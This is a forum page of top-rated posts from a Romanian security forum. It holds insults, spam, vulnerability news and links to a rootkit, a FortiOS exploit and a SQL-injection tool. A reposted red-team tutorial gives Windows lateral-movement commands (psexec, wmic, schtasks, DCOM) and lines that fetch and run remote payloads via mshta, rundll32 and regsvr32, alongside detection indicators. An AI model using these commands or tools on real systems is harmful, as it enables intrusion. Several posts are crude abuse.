Jump to content


Popular Content

Showing content with the highest reputation since 07/24/19 in Posts

  1. 6 points
    Ba, urmaresc forumu asta din umbra de ceva timp, nu am mai postat. Dar cat puteti ba sa fiti de terminati? Oare prostia asta a voastra nu are limite? Ce baza de date ba, ca aia era cu persoane de prin anii 90'. 80% din cei care sunt in baza aia de date au murit. Numa invitatii filelist, coduri, dork-uri si baze de date visati. Sa faceti ceva pentru viitoru vostru n-ati face. Ai aici oameni care sunt guru in Linux, care stiu Python si alte lucruri utile si voi cereti baze de date.
  2. 5 points
    Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. Ransomware has become a major threat to computer systems in recent years, as high-profile attacks have locked users out of personal computers, hospitals, city governments, and even The Weather Channel. Now, security researchers have discovered that another device that might be at risk: a DSLR camera. Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. In it, researcher Eyal Itkin found that a hacker can easily plant malware on a digital camera. He says that the standardized Picture Transfer Protocol is an ideal method for delivering malware: it’s unauthenticated and can be used with both Wi-Fi and USB. The report notes that individual with an infected Wi-Fi access point could deploy it at a tourist destination to pull off an attack, or infect a user’s PC. Reference Link : https://www.blackhatethicalhacking.com/dslr-cameras-vulnerable-to-ransomware-attack/
  3. 4 points
    32/64 bits version Sharing is caring Download link : https://mega.nz/?fbclid=IwAR3DhN9QsjIrDsdGHq-HQPjh15ghzefhx28wUUBZ0UGdeTyfhmutezFclSQ#F!8xh1EIyI!5cZd5_e-LI4Akw7YVYoBNA
  4. 3 points
    Salut, Desi apare destul de mult in referintele de pe forum: https://rstforums.com/forum/search/?q=Samsclass.info , i-am dat atentie abia de curand, cand am avut ceva de facut legat de Android. Sunt foarte multe resurse utile asa ca aveti ce invata: https://samsclass.info/ Succes!
  5. 3 points
    Cred ca ar fi util sa incepi sa iti folosesti creierul.
  6. 3 points
    Iti dau eu 10 dolari pe saptamana daca citesti despre ElasticSearch si imi faci cate un programel in pyton legat de ElasticSearch (cate 1 pe sapt). Ce zici?
  7. 3 points
    Acunetix si havij sa moara dujmani de ciuda baaaaaaaaaaaaaaaaaaaaaaaaaaa
  8. 2 points
    Offensive Lateral Movement Hausec Infosec August 12, 2019 12 Minutes Lateral movement is the process of moving from one compromised host to another. Penetration testers and red teamers alike commonly used to accomplish this by executing powershell.exe to run a base64 encoded command on the remote host, which would return a beacon. The problem with this is that offensive PowerShell is not a new concept anymore and even moderately mature shops will detect on it and shut it down quickly, or any half decent AV product will kill it before a malicious command is ran. The difficulty with lateral movement is doing it with good operational security (OpSec) which means generating the least amount of logs as possible, or generating logs that look normal, i.e. hiding in plain sight to avoid detection. The purpose is to not only show the techniques, but to show what is happening under the hood and any indicators associated with them. I’ll be referencing some Cobalt Strike syntax throughout this post, as it’s what we primarily use for C2, however Cobalt Strike’s built-in lateral movement techniques are quite noisy and not OpSec friendly. In addition, I understand not everyone has Cobalt Strike, so Meterpreter is also referenced in most examples, but the techniques are universal. There’s several different lateral movement techniques out there and I’ll try to cover the big ones and how they work from a high level overview, but before doing covering the methods, let’s clarify a few terms. Named Pipe: A way that processes communicate with each other via SMB (TCP 445). Operates on Layer 5 of the OSI model. Similar to how a port can listen for connections, a named pipe can also listen for requests. Access Token: Per Microsoft’s documentation: An access token is an object that describes the security context of a process or thread. The information in a token includes the identity and privileges of the user account associated with the process or thread. When a user logs on, the system verifies the user’s password by comparing it with information stored in a security database. When a user’s credentials are authenticated, the system produces an access token. Every process executed on behalf of this user has a copy of this access token. In another way, it contains your identity and states what you can and can’t use on the system. Without diving too deep into Windows authentication, access tokens reference logon sessions which is what’s created when a user logs into Windows. Network Logon (Type 3): Network logons occur when an account authenticates to a remote system/service. During network authentication, reusable credentials are not sent to the remote system. Consequently, when a user logs into a remote system via a network logon, the user’s credentials will not be present on the remote system to perform further authentication. This brings in the double-hop problem, meaning if we have a one-liner that connects to one target via Network logon, then also reaches out via SMB, no credentials are present to login over SMB, therefore login fails. Examples shown further below. PsExec PsExec comes from Microsoft’s Sysinternals suite and allows users to execute Powershell on remote hosts over port 445 (SMB) using named pipes. It first connects to the ADMIN$ share on the target, over SMB, uploads PSEXESVC.exe and uses Service Control Manager to start the .exe which creates a named pipe on the remote system, and finally uses that pipe for I/O. An example of the syntax is the following: psexec \\test.domain -u Domain\User -p Password ipconfig Cobalt Strike (CS) goes about this slightly differently. It first creates a Powershell script that will base64 encode an embedded payload which runs from memory and is compressed into a one-liner, connects to the ADMIN$ or C$ share & runs the Powershell command, as shown below The problem with this is that it creates a service and runs a base64 encoded command, which is not normal and will set off all sorts of alerts and generate logs. In addition, the commands sent are through named pipes, which has a default name in CS (but can be changed). Red Canary wrote a great article on detecting it. Cobalt Strike has two PsExec built-ins, one called PsExec and the other called PsExec (psh). The difference between the two, and despite what CS documentation says, PsExec (psh) is calling Powershell.exe and your beacon will be running as a Powershell.exe process, where PsExec without the (psh) will be running as rundll32.exe. Viewing the process IDs via Cobalt Strike By default, PsExec will spawn the rundll32.exe process to run from. It’s not dropping a DLL to disk or anything, so from a blue-team perspective, if rundll32.exe is running without arguments, it’s VERY suspicious. SC Service Controller is exactly what it sounds like — it controls services. This is particularly useful as an attacker because scheduling tasks is possible over SMB, so the syntax for starting a remote service is: sc \\host.domain create ExampleService binpath= “c:\windows\system32\calc.exe” sc \\host.domain start ExampleService The only caveat to this is that the executable must be specifically a service binary. Service binaries are different in the sense that they must “check in” to the service control manager (SCM) and if it doesn’t, it will exit execution. So if a non-service binary is used for this, it will come back as an agent/beacon for a second, then die. In CS, you can specifically craft service executables: Generating a service executable via Cobalt Strike Here is the same attack but with Metasploit: WMI Windows Management Instrumentation (WMI) is built into Windows to allow remote access to Windows components, via the WMI service. Communicating by using Remote Procedure Calls (RPCs) over port 135 for remote access (and an ephemeral port later), it allows system admins to perform automated administrative tasks remotely, e.g. starting a service or executing a command remotely. It can interacted with directly via wmic.exe. An example WMI query would look like this: wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” Cobalt Strike leverages WMI to execute a Powershell payload on the target, so PowerShell.exe is going to open when using the WMI built-in, which is an OpSec problem because of the base64 encoded payload that executes. So we see that even through WMI, a named piped is created despite wmic.exe having the capability to run commands on the target via PowerShell, so why create a named pipe in the first place? The named pipe isn’t necessary for executing the payload, however the payload CS creates uses the named pipe for communication (over SMB). This is just touching the surface of the capabilities of WMI. My co-worker @mattifestation gave an excellent talk during Blackhat 2015 on it’s capabilities, which can be read here. WinRM Windows Remote Management allows management of server hardware and it’s also Microsoft’s way of using WMI over HTTP(S). Unlike traditional web traffic, it doesn’t use 80/443, but instead uses 5985 (HTTP) and 5986 (HTTPS). WinRM comes installed with Windows by default, but does need some setup in order to be used. The exception to this being server OSs, as it’s on by default since 2012R2 and beyond. WinRM requires listeners (sound familiar?) on the client and even if the WinRM service is started, a listener has to be present in order for it to process requests. This can be done via the command in Powershell, or remotely done via WMI & Powershell: Enable-PSRemoting -Force From a non-CS perspective (replace calc.exe with your binary): winrs -r:EXAMPLE.lab.local -u:DOMAIN\user -p:password calc.exe Executing with CobaltStrike: The problem with this, of course, is that it has to be started with PowerShell. If you’re talking in remote terms, then it needs to be done via DCOM or WMI. While opening up PowerShell is not weird and starting a WinRM listener might fly under the radar, the noisy part comes when executing the payload, as there’s an indicator when running the built-in WinRM module from Cobalt Strike. With the indicator being: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile SchTasks SchTasks is short for Scheduled Tasks and operates over port 135 initially and then continues communication over an ephemeral port, using the DCE/RPC for communication. Similar to creating a cron-job in Linux, you can schedule a task to occur and execute whatever you want. From just PS: schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /RU System schtasks /run /tn ExampleTask /S host.domain schtasks /F /delete /tn ExampleTask /S host.domain In CobaltStrike: shell schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /RU System shell schtasks /run /tn ExampleTask /S host.domain Then delete the job (opsec!) shell schtasks /F /delete /tn ExampleTask /S host.domain MSBuild While not a lateral movement technique, it was discovered in 2016 by Casey Smith that MSBuild.exe can be used in conjunction with some of the above methods in order to avoid dropping encoded Powershell commands or spawning cmd.exe. MSBuild.exe is a Microsoft signed executable that comes installed with the .NET framework package. MSBuild is used to compile/build C# applications via an XML file which provides the schema. From an attacker perspective, this is used to compiled C# code to generate malicious binaries or payloads, or even run a payload straight from an XML file. MSBuild also can compile over SMB, as shown in the syntax below C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe \\host.domain\path\to\XMLfile.xml XML Template: https://gist.githubusercontent.com/ConsciousHacker/5fce0343f29085cd9fba466974e43f17/raw/df62c7256701d486fcd1e063487f24b599658a7b/shellcode.xml What doesn’t work: wmic /node:LABWIN10.lab.local /user:LAB\Administrator /password:Password! process call create "c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe \\LAB2012DC01.LAB.local\C$\Windows\Temp\build.xml" Trying to use wmic to call msbuild.exe to build an XML over SMB will fail because of the double-hop problem. The double-hop problem occurs when a network-logon (type 3) occurs, which means credentials are never actually sent to the remote host. Since the credentials aren’t sent to the remote host, the remote host has no way of authenticating back to the payload hosting server. In Cobalt Strike, this is often experienced while using wmic and the workaround is to make a token for that user, so the credentials are then able to be passed on from that host. However, without CS, there’s a few options to get around this: Locally host the XML file (drop to disk) copy C:\Users\Administrator\Downloads\build.xml \\LABWIN10.lab.local\C$\Windows\Temp\ wmic /node:LABWIN10.lab.local /user:LAB\Administrator /password:Password! process call create "c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe C:\Windows\Temp\build.xml" Host the XML via WebDAV (Shown further below) Use PsExec psexec \\host.domain -u Domain\Tester -p Passw0rd c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe \\host.domain\C$\Windows\Temp\build.xml" In Cobalt Strike, there’s an Aggressor Script extension that uses MSBuild to execute Powershell commands without spawning Powershell by being an unmanaged process (binary compiled straight to machine code). This uploads via WMI/wmic.exe. https://github.com/Mr-Un1k0d3r/PowerLessShell The key indicator with MSBuild is that it’s executing over SMB and MSBuild is making an outbound connection. MSBuild.exe calling the ‘QueryNetworkOpenInformationFile’ operation, which is an IOC. DCOM Component Object Model (COM) is a protocol used by processes with different applications and languages so they communicate with one another. COM objects cannot be used over a network, which introduced the Distributed COM (DCOM) protocol. My brilliant co-worker Matt Nelson discovered a lateral movement technique via DCOM, via the ExecuteShellCommand Method in the Microsoft Management Console (MMC) 2.0 scripting object model which is used for System Management Server administrative functions. It can be called via the following [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","")).Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0") DCOM uses network-logon (type 3), so the double-hop problem is also encountered here. PsExec eliminates the double-hop problem because credentials are passed with the command and generates an interactive logon session (Type 2), however, the problem is that the ExecuteShellCommand method only allows four arguments, so if anything less than or more than four is passed in, it errors out. Also, spaces have to be their own arguments (e.g. “cmd.exe”,$null,”/c” is three arguments), which eliminates the possibility of using PsExec with DCOM to execute MSBuild. From here, there’s a few options. Use WebDAV Host the XML file on an SMB share that doesn’t require authentication (e.g. using Impacket’s SMBServer.py, but most likely requires the attacker to have their attacking machine on the network) Try other similar ‘ExecuteShellCommand’ methods With WebDAV, it still utilizes a UNC path, but Windows will eventually fall back to port 80 if it cannot reach the path over 445 and 139. With WebDAV, SSL is also an option. The only caveat to this is the WebDAV does not work on servers, as the service does not exist on server OSs by default. [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe",$null,"\\\webdav\build.xml","7") This gets around the double-hop problem by not requiring any authentication to access the WebDAV server (which in this case, is also the C2 server). As shown in the video, the problem with this method is that it spawns two processes: mmc.exe because of the DCOM method call from MMC2.0 and MSBuild.exe. In addition, this does write to disk temporarily. Webdav writes to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV and does not clean up any files after execution. MSBuild temporarily writes to C:\Users\[USER]\AppData\Local\Temp\[RANDOM]\ and does clean up after itself. The neat thing with this trick is that since MSBuild used Webdav, MSbuild cleans up the files Webdav created. Other execution DCOM methods and defensive suggestions are in this article. Remote File Upload Not necessarily a lateral movement technique, it’s worth noting that you can instead spawn your own binary instead of using Cobalt Strikes built-ins, which (could be) more stealthy. This works by having upload privileges over SMB (i.e. Administrative rights) to the C$ share on the target, which you can then upload a stageless binary to and execute it via wmic or DCOM, as shown below. Notice the beacon doesn’t “check in”. It needs to be done manually via the command link target.domain Without CS: copy C:\Windows\Temp\Malice.exe \\target.domain\C$\Windows\Temp wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\Temp\Malice.exe” Other Code Execution Options There’s a few more code execution options that are possible, that require local execution instead of remote, so like MSBuild, these have to be paired with a lateral movement technique. Mshta Mshta.exe is a default installed executable on Windows that allows the execution of .hta files. .hta files are Microsoft HTML Application files and allow execution of Visual Basic scripts within the HTML application. The good thing about Mshta is that allows execution via URL and since it’s a trusted Microsoft executable, should bypass default app-whitelisting. mshta.exe https://malicious.domain/runme.hta Rundll32 This one is relatively well known. Rundll32.exe is again, a trusted Windows binary and is meant to execute DLL files. The DLL can be specified via UNC WebDAV path or even via JavaScript rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" Since it’s running DLLs, you can pair it with a few other ones for different techniques: URL.dll: Can run .url (shortcut) files; Also can run .hta files rundll32.exe url.dll,OpenURL "C:\Windows\Temp\test.hta" ieframe.dll: Can run .url files Example .url file: [InternetShortcut] URL=file:///c:\windows\system32\cmd.exe shdocvw.dll: Can run .url files as well Regsvr32 Register Server is used to register and unregister DLLs for the registry. Regsrv32.exe is a signed Microsoft binary and can accept URLs as an argument. Specifically, it will run a .sct file which is an XML document that allows registration of COM objects. regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll Read Casey Smith’s writeup for more in-depth explanation. Conclusion Once again, this list is not comprehensive, as there’s more techniques out there. This was simply me documenting a few things I didn’t know and figuring out how things work under the hood. When learning Cobalt Strike I learned that the built-ins are not OpSec friendly which could lead to the operator getting caught, so I figured I’d try to at least document some high level IOCs. I encourage everyone to view the MITRE ATT&CK Knowledge Base to read up more on lateral movement and potential IOCs. Feel free to reach out to me on Twitter with questions, @haus3c Share this: Twitter Facebook Published by Hausec View all posts by Hausec Published August 12, 2019 Sursa: https://hausec.com/2019/08/12/offensive-lateral-movement/
  9. 2 points
  10. 2 points
    Daca nu se mai inscriu retardati aici moare complet forumul
  11. 2 points
    Discovered by Microsoft's security team itself, all four vulnerabilities, CVE-2019-1181, CVE-2019-1182, CVE-2019-1222, and CVE-2019-1226, can be exploited by unauthenticated, remote attackers to take control of an affected computer system without requiring any user interaction. Just like BlueKeep RDP flaw, all four newly discovered vulnerabilities are also wormable and could be exploited by potential malware to propagate itself from one vulnerable computer to another automatically. Reference Link : https://thehackernews.com/2019/08/windows-rdp-wormable-flaws.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&utm_content=FaceBook&fbclid=IwAR0gMT730nUergbtGRe7cdnTMT4KFVGAfc9hrxwr5oiRSTen8Vi3Amxm84I
  12. 2 points
  13. 2 points
    SpaceCow - Python Rootkit Follow me on Twitter In the past days i spent a lot of time watching some RedTeam ops and I saw all these little tools making some awsome stuff... and in the 90% of the cases RedTeams don't share their tricks and softwares with others. So i thought I could create something open source. And after some days i crawled up with something... Acest script este doar pentru testing. Esti complet responsabil pentru ceea ce faci Download Link : https://github.com/TheSph1nx/SpaceCow?fbclid=IwAR0jCSepxcqcCNKv4gvhoxnVANO3YqndmuhX006-VKw1tunk2BINnF1DJQw
  14. 2 points
    Cred ca ar fi util sa mentionezi si orasul.
  15. 2 points
    1.) CVE-2019-9848: This vulnerability, which still exists in the latest version, resides in LibreLogo, a programmable turtle vector graphics script that ships by default with LibreOffice. LibreLogo allows users to specify pre-installed scripts in a document that can be executed on various events such as mouse-over. Discovered by Nils Emmerich, the flaw could allow an attacker to craft a malicious document that can silently execute arbitrary python commands without displaying any warning to a targeted user. "The big problem here is that the code is not translated well and just supplying python code as the script code often results in the same code after translation," Emmerich said. "Using forms and OnFocus event, it is even possible to get code execution when the document is opened, without the need for a mouse-over event." Emmerich also released a proof-of-concept for this attack on his blog post. 2.) CVE-2019-9849: This vulnerability, which you can fix by installing the latest available update, could allow the inclusion of remote arbitrary content within a document even when 'stealth mode' is enabled. The stealth mode is not enabled by default, but users can activate it to instruct documents retrieve remote resources only from trusted locations. How to Protect Your System Reference Link : https://thehackernews.com/2019/07/libreoffice-vulnerability.html Inführ has already notified LibreOffice team of the bypass issue, but until the team releases a patch to fix the bypass, users are recommended to update or reinstall the software without macros or at least without LibreLogo component, by following the below-mentioned steps. Open the setup to start the installation Select "Custom" installation Expand "Optional Components" Click on "LibreLogo" and select "This Feature Will Not Be Available" Click Next and then Install the software
  16. 2 points
    I-auzi, pula mea
  17. 2 points
  18. 2 points
    "Bine m-ati gasit! " Da, e un loc bun de pescuit, poate ai bulan si-ti da @jreister un cod
  19. 2 points
    Synopsis: Event log (evtx) parser with standardized CSV, XML, and json output! Custom maps, locked file support, and more! Source: https://ericzimmerman.github.io/#!index.md Blog Post: https://binaryforay.blogspot.com/2019/04/introducing-evtxecmd.html?view=sidebar Demo Video:
  20. 1 point
    Si eu fac acelasi lucru. Vad aceeasi terminati zile intregi nefacand nimic pentru viitorul lor. Sa va dam la muie tuturor!
  21. 1 point
    Iti recomand EEVBlog, are si un playlist cu videoclipuri despre panourile lui solare si in care face si calcule ca sa demonstreze ineficienta unor proiecte gen Solar Roadways. Nu e fix ce cauti dar cred ca te-ar ajuta, nu doar playlistul ci si canalul in sine. Are si forum, poate sun mai multe chestii p-acolo.
  22. 1 point
    The below versions of FortiOS were vulnerable. FortiOS 5.6.3 to 5.6.7 FortiOS 6.0.0 to 6.0.4 ONLY if the SSL VPN service (web-mode or tunnel-mode) is enabled. Download Link: https://github.com/milo2012/CVE-2018-13379?fbclid=IwAR3KlBz15aRQkNYGSHVproriKQPXBFB9fBPnSjkMurySlbnSvvqBB1dV7pI
  23. 1 point
    Esti o fortza mondiala. Sper sa-ti cada mana urmatoarea data cand esti atat de lenes incat nici macar formatarea n-ai scos-o, sa nu mai zic de 'funda' https://www.tpu.ro/educatie/stie-cineva-un-site-cu-video-uri-in-care-o-persoana-proiecteaza-un-panou-fotovoltaic-si-face-live-calcule-fizice-si/
  24. 1 point
    E fain design-ul, pacat ca era doar 1 online (adica eu)
  25. 1 point
  26. 1 point
    Download Link : https://ufile.io/3f6m4lwf Available for 30 days !
  27. 1 point
    ma-ta stie ce faci pe net?
  28. 1 point
    E de linux sau de windows? Mersi. Edit: vad ca e pt toate.
  29. 1 point
    Din aceeasi familie A script that you can run in the background! 1) Automate nmap scans. 2) Always have some recon running in the background. Once you find the inital ports in around 10 seconds, you then can start manually looking into those ports, and let the rest run in the background with no interaction from your side whatsoever. Download Link :https://github.com/21y4d/nmapAutomator Vanquish is Kali Linux based Enumeration Orchestrator. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases. Download Link : https://github.com/frizb/Vanquish
  30. 1 point
  31. 1 point
    Am facut un mic update la MultiEncoder.com (fostul Krypton). Interfata e schimbata si a fost rescris cu Vue in loc de jQuery. Ar trebui sa performeze mai bine la string-uri mari. Codul sursa se poate gasi pe GitHub, aici. https://multiencoder.com/#rst+powa Anuntati-ma daca gasiti bug-uri sau sugestii.
  32. 1 point
    Salutări! Ofer un loc de muncă pentru un student, de preferat, remote pentru proiecte mici de customizare WordPress sau site-uri HTML/CSS. Detalii: - Proiectele sunt pentru o agenție de web design (co-founder here). - Majoritatea proiectelor noastre se desfășoară pentru clienți din toată țara - Site-urile or să fie bazate cam 80% din ele pe WordPress, pe teme bazate pe Elementor/Visual Composer. - De partea tehnică mă voi ocupa eu cam tot timpul, respectiv bug-fixing și alte chestii care mai apar. - Ce am nevoie este cineva să se ocupe de customizare: după ce tema este instalată/configurată, trebuie create paginile, găsite imagini pentru site, editare texte, etc. practic temă -> site final, după un sketch făcut de mine. Model de lucru: https://imgur.com/a/N11jfiS - $$$ -> De bani discutăm on a project basis. În principiu munca nu e foarte grea, doar time consuming. Nu vreau nici să îmi bat joc de cineva, dar nici prețuri astronomice nu pot oferi de aceea caut un student, prefer pe cineva pe care chiar să îl ajute bănuții ăia. De muncă este, destul de mult acum și va fi chiar mai mult în viitor. Noi suntem momentan doi oameni, volumul de muncă e 110%, avem prea multe proiecte și nu le mai facem față. Dacă sunteți serioși și vă țineți de treabă, va fi bine pentru toată lumea. Other open positions: - Editare videouri Premiere Pro/After Effects - se dau templates, stock footage și eventual filmări făcute la diferite locații ale clienților. Trebuie produsul final. - Redactare articole bazate pe cuvinte cheie, la termene prestabilite Mulțumiri!
  33. 1 point
    PTPv3 - video + pdfs (in arhiva de mai sus sunt doar videourile) https://mega.nz/#!5o9GiCSb!pCFooU0Vz_UkfEjwYdIQNOLVQ1jez8UcrarCl8fXpJ4 Pass: eGxDTkCMrZb5y8c5
  34. 1 point
  35. 1 point
    Salut . la 80 de euro iti pot adauga eu 14k de abonati pe contul tau. Ma ocup cu marketing instagram , faceebok, twitter. Pagina de vanzari www.instagram.com/instashop_romania
  36. 1 point
    Cineva trebuie sa dezvolte acele CMS-uri, cine le foloseste trebuie sa le configureze, sa integreze mai multe tehnologii, sa rezolve probleme care apar ulterior. Nu e un lucru rau sa apara tehnologii care iti usureaza munca. Asta inseamna evolutia. E greu sa speculezi cand vine vorba de tehnologie, pentru ca evolueaza asa rapid, dar daca ne uitam in urma, se migreaza spre web. E mai usor sa accesezi un URL decat sa tot instalezi aplicatii si programe, si sa le si updatezi constant. Uita-te la site-urile gigant din ziua de azi cat sunt de complexe si cate tehnologii folosesc in spate. Nu se poate face asa ceva folosind doar niste CMS-uri out of the box. Invata tehnologiile folosite la ora actuala. Tehnologia se schimba si evolueaza, ceea ce e normal. Ceea ce faci acum in cateva zile, in viitor o sa poti face in cateva minute. Tot timpul apar alte layere peste cele deja existente, cu care o sa trebuiasca sa lucrezi. Cel mai important e sa stapanesti ceea ce exista acum, ca sa te poti adapta la ceea ce urmeaza. Totul este intr-o continua schimbare, si nimic nu ramane permanent.
  37. 1 point
    Are cineva cartea lui Rares, Corp de animal? Dau la schimb oricare alta carte de-a lui Alex David.
  38. 1 point
    Las-o ca te invata viata mult mai bine decat cartea.
  39. 1 point
    Si eu sunt mandru ca sunt roman, o sa va spun si de ce. Dupa ce am facut o facultate in Romania si gramada de cursuri si specializari diverse, am constatat ca nu imi pot gasi un loc de munca decent care sa-mi aduca satisfactie, asa ca mi-am deschis o firma care dupa mai putin de 2 ani am inchis-o pentru ca mi-am dat seama ca statul imi ia practic 70-80% din venituri iar eu raman cu MULT prea putin din munca mea. Am plecat prin Franta, am lucrat o scurta perioada de timp si apoi m-am mutat in Germania. Am deschis acolo o firma pe care am ridicat-o la un venit de peste 350.000 euro/anual (de la 0). Facusem in jur de +3000 clienti si ma gandeam sa ma extind, asa ca am mai deschis o firma in UK (filiala a celei din Germania) si am venit in Romania dupa aproape 5 ani cu gandul sa deschid si aici, sa angajez 2-3 studenti, sa inchiriez un spatiu frumos si sa facem o treaba. Plateam la furnizori de internet / servicii diverse din Romania in jur de 15.000 de euro (practic, era o investitie a unei firme Germane in Romania). Dupa exact 10 luni in care pregatisem toate cele, m-au arestat, au confiscat in mod abuziv toate echipamentele companiei Germane (cu datele clientilor) si s-au pisat pe mine. Deci, vreo 5 ani de munca pierduti, peste 3000 de clienti ramasi cu ochii in soare si inchis cu niste talhari, violatori, spargatori de apartamente si un pedofil. Great Chiar sunt mandru ca sunt roman. Mi-a oferit prea multe Romania sa nu fiu mandru. Am o socoteala de incheiat cu statul Roman apoi o sa pun degetul pe harta sa vad unde pot merge. Chiar si cetatenie de UNGUR daca imi iau, tot o sa fiu multumit ca nu o sa mai am acte in care sa scrie "CETATEAN ROMAN". Va doresc mult noroc, voua, celor iubitori de patrie.
  40. 0 points
    Salut! Ma numesc Emanuel, am 17 ani. Sunt pasionat de calculatoare si am venit pe forum la sfatu' unui amic. Amicul acesta mi-a spus ca e un loc bun, unde pot invata ceva nou. Sau in care sa-mi pierd timpul. Oricum sper ca o avut dreptate si sper ca comunitatea e friendly.
  41. -1 points
    mi se rupe pula de tine si de proiectele tale.
  42. -1 points
    link: http://www.mediafire.com/file/w4zapkanwges3bk/SQLi+8.5.rar pass: babyhacking Release notes: This news version comes with a lot of new features like 30% more hit on each search And also more than 45 new SQL Injection. Also now it is way faster when you are processing your dorks and when you are performing an injection. The tool does not crush anymore if you have 4GO of RAM or more. My blog: https://baby-hacking.blogspot.com
  43. -1 points
    Te-ai spălat cu Ariel?
  44. -1 points
  45. -2 points
    0770927413 poti suna ori direct mesaj pe insta 💥 tu stefann 💥 cont cu 68.8 K 100%români
  46. -2 points
    100% doar români.. Contul creste pe zi ce trece 0770927413 asta este nr meu pentru detalii sunati
  47. -3 points
    Am răscolit sa caut și eu un job și am găsit la voi aici și m-am gândit sa încerc și eu Pentru un film, episod, adult care include: Titlu, descriere copiată, poză, codul iframe de la video , tariful este de 50 EURO la 1000 de postări Pentru un film, episod, adult care include: Titlu, descriere copiată, 2 surse video ( codurile băgate în conturile personale ) , film,episod, adult pe servere personale tariful este de 100 EURO la 1000 de postări. Plata se face paypal înainte de comanda. Skype criss.ami
  • Create New...